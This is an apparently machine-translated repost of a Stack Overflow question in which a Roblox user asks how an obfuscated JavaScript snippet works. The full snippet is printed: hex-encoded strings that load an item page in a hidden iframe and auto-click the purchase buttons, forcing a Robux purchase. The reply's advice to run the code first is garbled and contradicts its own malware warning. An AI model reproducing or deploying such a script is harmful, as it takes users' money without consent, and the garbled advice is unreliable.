gpt4 book ai didi

javascript - 有人能告诉我这段代码是如何工作的吗?

转载 作者:行者123 更新时间:2023-12-02 07:35:34 27 4
gpt4 key购买 nike

我是游戏的用户Roblox有人给了我这个让我跑。我知道这很糟糕,因为我禁用了购买 T 恤会花钱的部分,这是代码底部的行,上面写着 /*iframe[_0xebe7[20]] = whe;*/.

变量 _0x2d54 是如何工作的?我以前从未见过这种类型的编码,这让我很困惑,因为我想了解它。

我不确定十六进制编码是如何工作的,但我遇到了一个类似的帖子:Decode this strange Javascript

var _0x2d54=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x2D\x74\x72\x61\x64\x65\x73\x2D\x69\x74\x65\x6D\x3F\x69\x64\x3D\x36\x37\x39\x32\x38\x39\x31\x38","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x75\x72\x63\x68\x61\x73\x65\x57\x69\x74\x68\x52\x6F\x62\x75\x78\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x72\x6F\x63\x65\x65\x64\x57\x69\x74\x68\x50\x75\x72\x63\x68\x61\x73\x65\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x62\x74\x6E\x44\x65\x6C\x65\x74\x65","\x77\x69\x64\x74\x68","\x31","\x68\x65\x69\x67\x68\x74","\x7A\x2D\x69\x6E\x64\x65\x78","\x73\x74\x79\x6C\x65","\x2D\x31","\x63\x6F\x6E\x74\x65\x6E\x74\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x20\x6C\x6F\x61\x64\x65\x64","\x6C\x6F\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6E\x66\x69\x72\x6D\x44\x65\x6C\x65\x74\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x63\x6C\x69\x63\x6B","\x73\x72\x63","\x6F\x6E\x6C\x6F\x61\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];

function whe(){
var _0x9b91x8 = iframe[_0xebe7[12]];
console[_0xebe7[14]](_0xebe7[13]);
if (_0x9b91x8[_0xebe7[15]](b3)){
iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
return function (){
return true;
}
;}
)();
iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
} else {
if(_0x9b91x8[_0xebe7[15]](b2)){
iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
} else {
if(_0x9b91x8[_0xebe7[15]](b1)){
iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
}
}
}
}
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);

最佳答案

您必须努力工作才能理解这段代码。开发人员故意让它难以理解。

他们混淆了代码以减慢复制它的其他人的速度。

您可以先更改变量并运行代码以查看发生了什么变化。这将为您提供有关该特定变量的作用的提示。但变数很多。

编辑:实际上,我收回这句话。尽量先运行代码来理解代码。正如马修在下面指出的那样,它可能是恶意软件。然后,一旦你有更好的想法,仔细戳它。

关于javascript - 有人能告诉我这段代码是如何工作的吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/16949205/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com